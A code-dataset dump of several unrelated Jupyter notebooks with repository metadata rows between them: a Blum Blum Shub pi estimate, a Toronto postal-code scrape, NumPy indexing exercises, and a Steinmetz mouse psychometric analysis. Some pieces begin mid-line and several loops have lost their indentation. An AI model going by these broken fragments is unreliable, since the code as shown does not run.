    parity of the state's set bits (any other mode emits no bits).

    Returns (result, state): the assembled output bits as an integer and
    the final internal state.

    Fixes: `state` was only assigned inside the loop, so bits == 0 raised
    UnboundLocalError; the builtin 3-argument ``pow`` and ``bin().count``
    replace the hand-rolled fastmod/parity helpers (identical results).
    """
    N = p * q
    result = 0
    state = s  # final state is well defined even when bits == 0
    for _ in range(bits):
        state = pow(state, 2, N)  # x_{i+1} = x_i^2 mod N
        if mode == 1:
            result = (result << 1) + state % 2
        elif mode == 2:
            result = (result << 1) + bin(state).count("1") % 2
    return result, state
def pi_approx(trials, mode):
    """Monte-Carlo estimate of pi/4 using BBS output as the randomness source.

    Builds a fresh 20-bit BBS generator, draws `trials` 16-bit words, splits
    each into an (x, y) point in [0, 255]^2 and counts how many fall inside
    the circle of radius 127.5 centred at (127.5, 127.5). The hit ratio
    approximates pi/4. `mode` selects the BBS bit-extraction rule (see blum).
    """
    circle = 0
    p,q,s = create_generator(20)
    for i in range(trials):
        # 16 fresh bits per trial; `s` threads the generator state through.
        a,s = blum(p,q,s,16,mode)
        x = a & 255   # low byte  -> x coordinate
        y = a >> 8    # high byte -> y coordinate
        if ((x - 127.5)*(x - 127.5) + (y- 127.5)*(y- 127.5) <= 127.5*127.5) :
            circle += 1.0
    #print('Pi/4 is = 0.78539816339')
    # +1 in numerator and denominator is a smoothing term (avoids a 0 estimate).
    pi = (circle+1.0) / (trials+1.0)
    #print('Our approximation is' , pi)
    return(pi)
# -
print(pi_approx(1000,1))
print(pi_approx(1000,2))
import matplotlib.pyplot as plt
import numpy as np
import time
# +
a = []
#trials = np.logspace(3,4,20, endpoint=True)
trials = [200,500,1000,2000,3000,4000,5000,10000]
start_time = time.time()
for i in trials:
a.append(pi_approx(i,1))
print(time.time()-start_time)
plt.plot(trials,a)
plt.hlines(y=math.pi/4,xmin=0,xmax = 10000, colors='red', linestyles='solid', label='pi/4')
plt.show()
# +
a = []
#trials = np.logspace(3,4,20, endpoint=True)
trials = [200,500,1000,2000,3000,4000,5000,10000]
start_time = time.time()
for i in trials:
a.append(pi_approx(i,2))
plt.plot(trials,a)
plt.hlines(y=math.pi/4,xmin=0,xmax = 10000, colors='red', linestyles='solid', label='pi/4')
plt.show()
# -
| 6,268 |
/chapter04_组的概念与定义.ipynb
|
aa74f8f5c81ba31434b15fc6614107acc56b2fc2
|
[] |
no_license
|
dyanfeng/python
|
https://github.com/dyanfeng/python
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 17,607 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import numpy as np # library to handle data in a vectorized manner
import pandas as pd # library for data analsysis
pd.set_option("display.max_columns", None)
pd.set_option("display.max_rows", None)
import json # library to handle JSON files
from geopy.geocoders import Nominatim # convert an address into latitude and longitude values
import requests # library to handle requests
from bs4 import BeautifulSoup # library to parse HTML and XML documents
from pandas.io.json import json_normalize # tranform JSON file into a pandas dataframe
# Matplotlib and associated plotting modules
import matplotlib.cm as cm
import matplotlib.colors as colors
# import k-means from clustering stage
from sklearn.cluster import KMeans
import folium # map rendering library
print("Libraries imported.")
# -
# ## Scrap data from Wikipedia page into a DataFrame
# send the GET request
data = requests.get('https://en.wikipedia.org/wiki/List_of_postal_codes_of_Canada:_M').text
# parse data from the html into a beautifulsoup object
soup = BeautifulSoup(data, 'html.parser')
# create three lists to store table data
postalCodeList = []
boroughList = []
neighborhoodList = []
# +
# find the table
#soup.find('table').find_all('tr')
# +
# find all the rows of the table
#soup.find('table').find_all('tr')
# +
# for each row of the table, find all the table data
#for row in soup.find('table').find_all('tr'):
# cells = row.find_all('td')
# -
# append the data into the respective lists
# Walk every <tr> of the first table; data rows have <td> cells (header
# rows have none) in the fixed order: postal code, borough, neighborhood.
for row in soup.find('table').find_all('tr'):
    cells = row.find_all('td')
    if(len(cells) > 0):
        postalCodeList.append(cells[0].text)
        boroughList.append(cells[1].text)
        neighborhoodList.append(cells[2].text.rstrip('\n')) # avoid new lines in neighborhood cell
# +
# create a new DataFrame from the three lists
toronto_df = pd.DataFrame({"PostalCode": postalCodeList,
"Borough": boroughList,
"Neighborhood": neighborhoodList})
toronto_df.head()
# -
# Strip stray newline characters from every column (the scraped cell text
# keeps them); .head() just previews the cleaned frame in the notebook.
for col in toronto_df.columns:
    toronto_df[col]=toronto_df[col].str.replace('\n','')
toronto_df.head()
# ## Drop cells with a borough that is "Not assigned"
# drop cells with a borough that is Not assigned
toronto_df_dropna = toronto_df[toronto_df.Borough != "Not assigned"].reset_index(drop=True)
toronto_df_dropna.head()
# ## Group neighborhoods in the same borough
# group neighborhoods in the same borough
toronto_df_grouped = toronto_df_dropna.groupby(["PostalCode", "Borough"], as_index=False).agg(lambda x: ", ".join(x))
toronto_df_grouped.head()
# ## For Neighborhood="Not assigned", make the value the same as Borough
# +
# for Neighborhood="Not assigned", make the value the same as Borough
for index, row in toronto_df_grouped.iterrows():
if row["Neighborhood"] == "Not assigned":
row["Neighborhood"] = row["Borough"]
toronto_df_grouped.head()
# -
# ## Check whether it is the same as required by the question
# +
# create a new test dataframe
column_names = ["PostalCode", "Borough", "Neighborhood"]
test_df = pd.DataFrame(columns=column_names)
test_list = ["M5G", "M2H", "M4B", "M1J", "M4G", "M4M", "M1R", "M9V", "M9L", "M5V", "M1B", "M5A"]
for postcode in test_list:
test_df = test_df.append(toronto_df_grouped[toronto_df_grouped["PostalCode"]==postcode], ignore_index=True)
test_df
# -
# ## Finally, print the number of rows of the cleaned dataframe
# print the number of rows of the cleaned dataframe
toronto_df_grouped.shape
p(*d.maps[1:])。
# +
import collections
x = {'a': 1, 'b': 2}
y = {'b': 10, 'c': 11}
z = collections.ChainMap(y, x)
print(z.maps)
xx = {'d': 55, 'e': 88}
z = z.parents
print(z.maps)
# -
: 104} outputId="a93f7efc-5915-4091-8a8d-985808ce89a2"
arr = np.arange(15).reshape(3,5)#range of array from 0 to 15
print(arr)
print(arr.ndim)
print(arr.itemsize)
# + id="1F0JNmqMjt9A" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 104} outputId="b7138322-4b3a-403c-f8b3-0652d925bf7a"
arr = np.arange(15).reshape(3,5)#range of array from 0 to 15
print(arr)
print(arr.ndim)
print(type(arr))
# + id="cx4iKL3nkKeh" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 87} outputId="84a9db38-9b7b-4583-8bb3-541c3114c2fe"
arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
print(arr)
print(arr.shape)
# + id="G3mc4iq-khK1" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 87} outputId="63a75b35-f418-4177-de6e-26926d716265"
arr = np.array([[1,2,3], [5,6,7], [9,10,11]])
print(arr)
print(arr.shape)
# + id="Bf7jVIKzkte1" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="17a209a3-3c0c-490f-f70a-cea5e250010f"
arr = np.array([[1,2,3]])
print(arr)
print(arr.shape)
# + id="mmgF_vs3k_Pl" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="ce82102a-80b7-4bfb-e2d1-6e5c10b626ef"
arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
print(arr[:2, 1:3])
# + id="fVEevadxlO4D" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 69} outputId="e06ddf48-d2c5-4553-f71b-74e778cf5c39"
arr = np.array([1,2,3])
print(arr[:0])
print(arr[:1])
print(arr[:2])
# + id="VtxJE2NglpRD" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 121} outputId="b51fe062-61aa-480a-fdd1-2f51d24e348d"
arr = np.array([1,2,3])
print(arr[0:3])
print(arr[1:3])
print(arr[2:3])
print(arr[0:1])
print(arr[0:2])
print(arr[0:3])
# + id="4-2176m5mydj" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 104} outputId="7f0a747c-6c4e-4cef-af2a-83adde3f8ca8"
arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
print(arr[2, 1])
print(arr[:2])
print(arr[0:2])
# + id="0pD2bT0CnrOJ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="a0609496-bd5c-4ba9-f9e3-f93f5cdb65b2"
arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
print(arr[:2, 1:3])
# + [markdown] id="DXYYtoLjn8Y7" colab_type="text"
# print(arr[:2, 1:3]) works as follows: starting from
#
# np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
# the row slice :2 first selects rows 0 and 1, i.e. [1,2,3,4] and [5,6,7,8]; then the column
# slice 1:3 keeps positions 1-2 of each row, giving [2 3] from [1,2,3,4] and [6 7] from [5,6,7,8].
# + id="hgBGz3T3peoV" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="6178476c-b121-428d-9e56-42f0b9688f09"
arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
row_r1 = arr[1, :]
row_r2 = arr[1:2, :]
print(row_r1)
print(row_r2)
# + id="oyG5BecNqQJ6" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="1681c835-875f-4b3e-fd93-9d925a71861b"
a = [1,2,3]
print(a[0])
print(a[0:1])
# + id="881KDS33--Rt" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="c2d74a10-0bef-4b0a-d09e-d2736864e71f"
arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
row_r1 = arr[1, :]
row_r2 = arr[1:2, :]
print(row_r1.shape)
print(row_r2.shape)
# + id="nfGcM4Nm_9pu" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 139} outputId="94035796-401d-4a4e-d85b-13647fed43e6"
arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
row_r1 = arr[:, 1]
row_r2 = arr[:, 1:2]
print(row_r1)
print(row_r2)
print(row_r1.shape)
print(row_r2.shape)
print(arr.shape)
# + id="7pGTFNVmBLc8" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 35} outputId="7b41a22c-28bd-407b-df17-c95070c61971"
arr = np.array([[1, 2], [3, 4], [5, 6]])
print(arr[[0, 1, 2], [0, 1, 0]])
# + [markdown] id="gI-u7lpJCcl0" colab_type="text"
# print(arr[[0, 1, 2], [0, 1, 0]]) this statement is equal to
#
# print(np.array([arr[0,0], arr[1,1], arr[2,0]]))
# + id="5hOSjGYrxAPw" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 69} outputId="136b8889-8c1b-4d73-941a-b4e5f66e91f7"
arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
print(arr > 2)
# + id="sGjFX9G-xKWH" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 35} outputId="98627c7a-fa2c-4cf5-e8a2-a249c0f83b46"
arr = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
print(arr[arr > 2])
# + id="3XzvcPNdCxdQ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 69} outputId="5e841268-4de1-446f-e921-888e885d5a61"
arr = np.array([1, 2])
print(np.dtype)
arr = np.array([1.0, 2.0])
print(np.dtype)
arr = np.array([1.0,2.0], dtype = np.int64)
print(arr)
# + id="t4xKQm1pyxUN" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 69} outputId="34341b4f-501c-4b57-be9f-6eb78895493b"
arr = np.array([1, 2])
print(arr.dtype)
arr = np.array([1.0, 2.0])
print(arr.dtype)
arr = np.array([1.0,2.0], dtype = np.int64)
print(arr)
# + id="SLhw1ImpzNsm" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="cfe2c985-7f5f-460c-d196-17ff6503a557"
arr_a = np.array([1.0, 2.0])
arr_b = np.array([3.0, 4.0])
print(arr_a + arr_b)
print(np.add(arr_a, arr_b))
# + id="HtdTyTO_3OBh" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="c73f560f-0df7-4c6d-fd71-5b856056fb3d"
print(arr_b- arr_a)
print(np.subtract(arr_b, arr_a))
# + id="H_COm2pR3QWx" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="8e44777b-06ea-45ac-83f7-07dd802d112e"
print(arr_b * arr_a)
print(np.multiply(arr_b, arr_a))
# + id="71NYwYpczXw9" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="a6850276-9c0d-408a-fb8b-711a022cbe60"
print(arr_b / arr_a)
print(np.divide(arr_b, arr_a))
# + id="NWRD9_h93Wtl" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="374c7443-9576-4a72-ada9-7369aac1a140"
print(np.sqrt(arr_a))
print(np.sqrt(arr_b))
# + id="CnUmLMXT3ZFh" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="0eca762a-0748-4150-9245-d8d6f7c069e4"
print(np.dot(arr_a, arr_b))
print(arr_a.dot(arr_b))
# + id="66HOMqJt3auR" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 69} outputId="da9baced-6e1a-4a8e-9184-a174e2b2b5c8"
arr = np.array([arr_a, arr_b])
print(np.sum(arr, axis = 0))
print(np.sum(arr, axis = 1))
print(arr_a.T)
# + [markdown] id="T1n5tjay5Slm" colab_type="text"
# arr_a = np.array([1.0, 2.0])
#
# arr_b = np.array([3.0, 4.0])
#
# for axis = 0 [3+1 4+2] which is equal to [4 6]
#
# and for axis = 1 [1+2 3+4] which is equal to [3 7]
# + id="swF1utIf6Biy" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 52} outputId="0a7cd709-ddd7-4f9e-b64c-486bab4a3695"
print(arr.T)
| 10,965 |
/NMA_Project/.ipynb_checkpoints/Steinmetz_psychometric.v3-checkpoint.ipynb
|
263b1207c2bc5850e6b4ba7d16bafaf5fc6255f3
|
[] |
no_license
|
Y-Akihiro/NMA2020
|
https://github.com/Y-Akihiro/NMA2020
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 304,061 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Psychometric Curve
# ## Import Libraries and functions
# +
import numpy as np
import pandas as pd
import os, requests
import matplotlib.cm as cm
colormap = cm.viridis
from functions import hide_toggle
hide_toggle()
# -
import functions
# dir(functions)
# ## Import plot functions and define parameters
# import matplotlib and set defaults
from matplotlib import rcParams
from matplotlib import pyplot as plt
rcParams['figure.figsize'] = [20, 4]
rcParams['font.size'] =15
rcParams['axes.spines.top'] = False
rcParams['axes.spines.right'] = False
rcParams['figure.autolayout'] = True
# ## Load data
# Load Data
from functions import load_names # a function to get the file names
# +
# This part takes time
fname = [] # initialize the list
fname = load_names()
print(fname)
# Data loading
alldat = np.array([])
for j in range(len(fname)):
alldat = np.hstack((alldat, np.load('steinmetz_part%d.npz'%j, allow_pickle=True)['dat']))
# -
alldat.shape
# ## Select session and group brain regions
# Function: dat, barea, NN, regions, brain_groups, nareas = load_data(n_session)
from functions import load_data
# ## Define functions: contrast difference & total contrast
# Function: dt, NT, task_diff, dtask_diff, dtdiff = get_task_difference(n_session)
# +
def get_task_difference(n_session):
    """Derive contrast-difference quantities for one Steinmetz session.

    Returns, in order: bin_size (10 ms bins), number of time bins,
    the signed contrast difference (left - right), its absolute value,
    the trial-to-trial change of the absolute difference, and that same
    change with a leading 0 inserted so its length matches the trial count.
    """
    dat = load_data(n_session, alldat)[0]  # only the session dict is used here
    bin_size = dat['bin_size']  # binning at 10 ms
    n_bins = dat['spks'].shape[-1]
    signed_diff = dat['contrast_left'] - dat['contrast_right']
    abs_diff = np.abs(signed_diff)
    delta = np.diff(abs_diff)  # change relative to the previous trial
    padded_delta = np.insert(delta, 0, 0)  # pad front so sizes line up
    return bin_size, n_bins, signed_diff, abs_diff, delta, padded_delta
# dt, NT, task_diff, dtask_diff, dtdiff = get_task_difference(1)
# +
n_session = 8
dat, barea, NN, regions, brain_groups, nareas = load_data(n_session, alldat)
_, _, cont_diff, _, _, _ = get_task_difference(n_session)
plt.plot(cont_diff,'ro-', label='contrast difference')
plt.plot(dat['response'],'bo', label='response')
plt.legend()
plt.show()
# -
print(len(cont_diff))
unique, counts = np.unique(cont_diff, return_counts=True) # check the contrast differences and the number of occurences
dict(zip(unique,counts))
print('session: ', n_session)
print('contrast difference:', np.unique(cont_diff)[-1],' occurence:', counts[-1])
resp = (dat['response'][cont_diff==1])
# np.sum(resp)
# np.count_nonzero(resp==1)
# resp.shape
# ### Plot Rightward choice over contrast difference
# This cell is for model fitting (psychometric curve)
from scipy.optimize import curve_fit
from functions import func
func
# +
# def model_fit(func, xdata, ydata):
# '''
# For some reason, curve_fit doesn't work for the original data.
# Here, ydata is divided by 10 and the fit parameters are adjusted.
# '''
# popt, pcov = curve_fit(func, xdata, ydata/10)
# popt_correct = np.array([popt[0], popt[1], popt[2]*10, popt[3]])
# return popt_correct
# +
from functions import get_rightward # Get the % of rightward choice
# ========== Select session number ==========
n_session=11
dat, _, _, _, _, _ = load_data(n_session, alldat)
_, _, cont_diff, _, _, _ = get_task_difference(n_session)
rightward = get_rightward(dat, cont_diff)
xdata = np.unique(cont_diff)
ydata = rightward
# ========== Compute model fit (psychometric curve) ==========
popt, pcov = curve_fit(func, xdata, ydata)
# popt = model_fit(func, xdata, ydata)
# ========== Plot ==========
fig = plt.figure(figsize=(6,4))
plt.plot(xdata, ydata,'o-', label=n_session)
plt.plot(xdata, func(xdata, *popt), 'r--',
label='fit: x0=%5.3f, y0=%5.3f, a=%5.3f, b=%5.3f' % tuple(popt))
plt.xlabel('Contrast difference')
plt.ylabel('Rightward (%)')
plt.title('Session: %1.0f, '%n_session + dat['mouse_name'])
plt.legend(loc='upper left', fontsize=10)
plt.show()
# -
# ### 39 Sessions
# +
fig = plt.figure(figsize=(6,4))
# ========== Select session number ==========
rt_data = np.zeros((39,9))
for n_session in range(39):
dat, _, _, _, _, _ = load_data(n_session, alldat)
_, _, cont_diff, _, _, _ = get_task_difference(n_session)
rightward = get_rightward(dat, cont_diff)
rt_data[n_session,:]=rightward
# ========== Plot ==========
plt.plot(np.unique(cont_diff),rightward,'.', label=n_session, alpha=0.4)
# ========== Comput and plot mean and variance ==========
rt_mean = np.zeros(9)
for i in range(9):
rt_mean[i] = np.mean(rt_data[:,i])
# print(np.std(rt_data[:,i]))
plt.errorbar(np.unique(cont_diff)[i], np.mean(rt_data[:,i]), np.std(rt_data[:,i]), fmt='-ko')
plt.plot(np.unique(cont_diff), rt_mean, 'k-', alpha=1)
plt.xlabel('Contrast difference')
plt.ylabel('Rightward (%)')
plt.title('39 sessions')
# plt.legend()
plt.show()
# -
# ## History Dependence
def get_right_hist(dat, cont_diff):
    """
    Split rightward-choice percentages by the previous trial's difficulty.
    Inputs:
    * dat - trial data
    * cont_diff - contrast difference between left and right
    Return:
    * reasy_l - % of mice respond right for each contrast difference, previous trial is easy left
    * rdiff_l - % of mice respond right for each contrast difference, previous trial is difficult left
    * reasy_r - % of mice respond right for each contrast difference, previous trial is easy right
    * rdiff_r - % of mice respond right for each contrast difference, previous trial is difficult right
    * r_zero  - same, but the previous trial had zero contrast difference
    * n_trials - occurrence count per history category plus the total trial count
    """
    # Unique contrast-difference values (9 of them) and their trial counts.
    unique, counts = np.unique(cont_diff, return_counts=True) # check the contrast differences and the number of occurences
    n_el = n_dl = n_er = n_dr = n_zero = 0
    # Define easy/difficult left/right (boolean array)
    # NOTE(review): intermediate contrasts (+/-0.5, +/-0.75) are deliberately
    # commented out, so trials at those values enter no history category.
    easy_l = (cont_diff==-1) #+ (cont_diff==-0.75)
    diff_l = (cont_diff==-0.25) #+ (cont_diff==-0.5)
    diff_r = (cont_diff==0.25) #+ (cont_diff==0.5)
    easy_r = (cont_diff==1) #+ (cont_diff==0.75)
    # Accumulators, one per history category, shaped [trial, contrast-bin, 2]:
    # channel 0 holds the *following* trial's response; channel 1 (row 0 only)
    # counts how often each contrast bin follows this history.
    reasy_l = np.zeros((easy_l.sum(),9,2)) # 59 x 9
    rdiff_l = np.zeros((diff_l.sum(),9,2)) # 52 x 9
    reasy_r = np.zeros((easy_r.sum(),9,2)) # 41 x 9
    rdiff_r = np.zeros((diff_r.sum(),9,2)) # 62 x 9
    rzero = np.zeros(((cont_diff==0).sum(),9,2)) # 126 x 9
    # Check the number of trials for each difficulties
    n_trials = np.zeros(6)
    n_trials[0] = rzero.shape[0]
    n_trials[1] = reasy_l.shape[0]
    n_trials[2] = rdiff_l.shape[0]
    n_trials[3] = rdiff_r.shape[0]
    n_trials[4] = reasy_r.shape[0]
    n_trials[5] = dat['spks'].shape[1]
    # Classify each trial i by its difficulty, then record trial i+1's
    # response under the contrast bin of trial i+1.
    for i in range(len(dat['response'])-1):
        hist = cont_diff[i] # previous trial difficulty (size) & direction (sign)
        idx_cont = np.where(unique==cont_diff[i+1])[0][0] # current trial difficulty and direction label (9 unique labels)
        if hist == -1: #in unique[0:2]: # easy left
            reasy_l[n_el, idx_cont,0] = dat['response'][i+1]
            reasy_l[0,idx_cont,1] +=1
            n_el += 1
        elif hist == -0.25: #in unique[2:4]: # difficult left
            rdiff_l[n_dl, idx_cont,0] = dat['response'][i+1]
            rdiff_l[0, idx_cont,1] += 1
            n_dl += 1
        elif hist == 0.25: #in unique[5:7]: # difficult right
            rdiff_r[n_dr, idx_cont,0] = dat['response'][i+1]
            rdiff_r[0, idx_cont,1] += 1
            n_dr += 1
        elif hist == 1.0: #in unique[7:9]: # easy right
            reasy_r[n_er, idx_cont,0] = dat['response'][i+1]
            reasy_r[0, idx_cont,1] += 1
            n_er += 1
        elif hist == 0:
            rzero[n_zero, idx_cont,0] = dat['response'][i+1]
            rzero[0, idx_cont,1] += 1
            n_zero += 1
        else:
            hist += 1 # some action. (whatever is fine to pass)
            # print('Check: something is wrong')
    # Convert counts of +1 responses (this notebook's rightward label --
    # confirm against get_rightward) into percentages per contrast bin.
    # Use np.divide(a, b, out=np.zeros(a.shape), where=b!=0) to avoid 0 division error
    r_easyr = np.divide(np.count_nonzero(reasy_r[:,:,0]==1,axis=0),
                        reasy_r[0,:,1],
                        out=np.zeros(np.count_nonzero(reasy_r[:,:,0]==1,axis=0).shape),
                        where=(reasy_r[0,:,1]!=0)) * 100
    r_easyl = np.divide(np.count_nonzero(reasy_l[:,:,0]==1,axis=0),
                        reasy_l[0,:,1],
                        out=np.zeros(np.count_nonzero(reasy_l[:,:,0]==1,axis=0).shape),
                        where=(reasy_l[0,:,1]!=0)) * 100
    r_diffr = np.divide(np.count_nonzero(rdiff_r[:,:,0]==1,axis=0),
                        rdiff_r[0,:,1],
                        out=np.zeros(np.count_nonzero(rdiff_r[:,:,0]==1,axis=0).shape),
                        where=(rdiff_r[0,:,1]!=0)) * 100
    r_diffl = np.divide(np.count_nonzero(rdiff_l[:,:,0]==1,axis=0),
                        rdiff_l[0,:,1],
                        out=np.zeros(np.count_nonzero(rdiff_l[:,:,0]==1,axis=0).shape),
                        where=(rdiff_l[0,:,1]!=0)) * 100
    r_zero = np.divide(np.count_nonzero(rzero[:,:,0]==1,axis=0),
                       rzero[0,:,1],
                       out=np.zeros(np.count_nonzero(rzero[:,:,0]==1,axis=0).shape),
                       where=(rzero[0,:,1]!=0)) * 100
    return r_easyr, r_easyl, r_diffr, r_diffl, r_zero, n_trials
hide_toggle()
def plot_hist(n_session, dat, cont_diff, rightward, r_diffr, r_easyr, r_easyl, r_diffl):
    """Plot rightward-choice curves split by the previous trial's difficulty.

    NOTE(review): this function also reads the module-level globals
    `n_trials` (legend trial counts) and `r_zero` (zero-contrast history
    curve) without taking them as parameters, so it only works after
    get_right_hist() has run at top level -- consider passing them in.
    """
    fig = plt.figure(figsize=(7,5))
    xdata = np.unique(cont_diff)
    # Overall psychometric curve across all trials.
    plt.plot(xdata, rightward,'bo-', label='all (%1.0f)'%n_trials[-1])
    # popt,_ = curve_fit(func, xdata, rightward)
    # plt.plot(xdata, func(xdata, *popt), 'b:',
    #          label='fit: all')
    plt.plot(xdata, r_diffr,'g.-', label='diff_r (%1.0f)'%n_trials[3], alpha=0.5)
    # popt,_ = curve_fit(func, xdata, r_diffr)
    # plt.plot(xdata, func(xdata, *popt), 'g:',
    #          label='fit: diff_r')
    plt.plot(xdata, r_easyr,'y.-', label='easy_r (%1.0f)'%n_trials[4], alpha=0.5)
    # popt,_ = curve_fit(func, xdata, r_easyr)
    # plt.plot(xdata, func(xdata, *popt), 'y:',
    #          label='fit: easy_r')
    plt.plot(xdata, r_zero ,'ro-', label='zero (%1.0f)'%n_trials[0])
    # popt,_ = curve_fit(func, xdata, r_zero)
    # plt.plot(xdata, func(xdata, *popt), 'r:',
    #          label='fit: zero')
    plt.plot(xdata, r_easyl,'c.-', label='easy_l (%1.0f)'%n_trials[1], alpha=0.5)
    # popt,_ = curve_fit(func, xdata, r_easyl)
    # plt.plot(xdata, func(xdata, *popt), 'c:',
    #          label='fit: easy_l')
    plt.plot(xdata, r_diffl,'m.-', label='diff_l (%1.0f)'%n_trials[2], alpha=0.5)
    # popt,_ = curve_fit(func, xdata, r_diffl)
    # plt.plot(xdata, func(xdata, *popt), 'm:',
    #          label='fit: diff_l')
    plt.xlabel('Contrast difference')
    plt.ylabel('Rightward (%)')
    plt.title('Session: %1.0f, '%n_session + dat['mouse_name'])
    plt.legend(fontsize=8)
    plt.show()
# ========== Select session number ==========
n_session=11
dat, _, _, _, _, _ = load_data(n_session, alldat)
_, _, cont_diff, _, _, _ = get_task_difference(n_session)
r_easyr, r_easyl, r_diffr, r_diffl, r_zero, n_trials = get_right_hist(dat, cont_diff)
# ========== Plot ==========
plot_hist(n_session, dat, cont_diff, rightward, r_diffr, r_easyr, r_easyl, r_diffl)
# +
# Accumulate the history-split curves over all 39 sessions.
# NOTE(review): the chained assignment binds all five names to the SAME
# zeros array; this stays correct only because the loop rebinds each name
# with `name = name + ...` (a new array) rather than mutating with +=.
rer = rel = rdr = rdl = rz = np.zeros(9)
for i in range(39):
    n_session = i
    dat, _, _, _, _, _ = load_data(n_session, alldat)
    _, _, cont_diff, _, _, _ = get_task_difference(n_session)
    r_easyr, r_easyl, r_diffr, r_diffl, r_zero, n_trials = get_right_hist(dat, cont_diff)
    # Sum per-session rightward percentages, one accumulator per history bin.
    rdr = rdr + r_diffr
    rdl = rdl + r_diffl
    rer = rer + r_easyr
    rel = rel + r_easyl
    rz = rz + r_zero
# -
# Convert the sums into across-session means.
rer = rer/39
rel = rel/39
rdl = rdl/39
rz = rz/39
rdr = rdr/39
fig = plt.figure(figsize=(7,5))
xdata = np.unique(cont_diff)
plt.plot(xdata, rightward, 'bo-', label='all')
plt.plot(xdata, rdr, 'g.-', label='diff_r', alpha=0.5)
plt.plot(xdata, rer, 'y.-', label='easy_r', alpha=0.5)
plt.plot(xdata, rz , 'ro-', label='zero')
plt.plot(xdata, rel, 'c.-', label='easy_l', alpha=0.5)
plt.plot(xdata, rdl, 'm.-', label='diff_l', alpha=0.5)
plt.xlabel('Contrast difference')
plt.ylabel('Rightward (%)')
plt.title('Average of 39 Sessions (10 mice)')
plt.legend(fontsize=8)
plt.show()
# ## Modeling
dat['spks'].shape
(np.ones(3).reshape(-1,1)).shape
X=(np.linspace(-10,10,20)*np.ones(5).reshape(-1,1)).T
# +
from sklearn.linear_model import LogisticRegression
log_reg = LogisticRegression(penalty="none") # initialize the model with a hyperparameter.
# X matrix: (n_samples, n_features)
# y vector: (n_samples)
# X = np.ones((20,5))
y = np.concatenate((np.zeros(10), np.ones(10)), axis=0)
log_reg.fit(X, y) # fit the model
# -
y_pred = log_reg.predict(X)
# ### Psychometric Function Modeling (four-parameter logistic function)
# Curve fitting reference: https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.curve_fit.html
from scipy.optimize import curve_fit
from functions import func
# def func(x,x0,y0,a,b):
# '''
# Four-parameter logistic function for model fitting
# '''
# return y0 + a/(1+np.exp(-(x-x0)/b))
def psyc(x,x0,y0,a,b, mu, sigma):
    """Four-parameter logistic curve plus additive Gaussian noise.

    One N(mu, sigma) sample is drawn per element of x, so the result is a
    noisy realisation of the underlying psychometric curve -- used to
    generate sample (pseudo) data for fitting demos.
    """
    curve = y0 + a / (1 + np.exp(-(x - x0) / b))
    jitter = np.random.normal(mu, sigma, np.array(x.shape[0]))
    return curve + jitter
# +
N = 90 # number of points
xdata = np.linspace(-10,10,N)
ytrue = func(xdata, 0, 1,0.5)*10
ydata = ytrue + np.random.normal(0,0.5, np.array(xdata.shape[0]))
# Compute fit
popt, pcov = curve_fit(func, xdata, ydata)
# Plot stuff
fig = plt.figure(figsize=(6,4))
plt.plot(xdata, ytrue, label='true curve')
plt.plot(xdata, ydata,'r.', label='sample (pseudo) data')
plt.plot(xdata, func(xdata, *popt), 'g--',
label='fit: x0=%5.3f, a=%5.3f, b=%5.3f' % tuple(popt))
plt.legend(loc='upper left', fontsize=10)
plt.plot()
# -
# ## Test fitting
# +
fig = plt.figure(figsize=(6,4))
xdata = np.unique(cont_diff)
ydata = r_zero/10
# print(ydata)
plt.plot(xdata, ydata,'.-', label='diff_l data (%1.0f)'%n_trials[2])
popt, pcov = curve_fit(func, xdata, ydata, maxfev=1000)
plt.plot(xdata, func(xdata, *popt), 'g--',
label='fit: x0=%5.3f, a=%5.3f, b=%5.3f' % tuple(popt))
plt.xlabel('Contrast difference')
plt.ylabel('Rightward (%)')
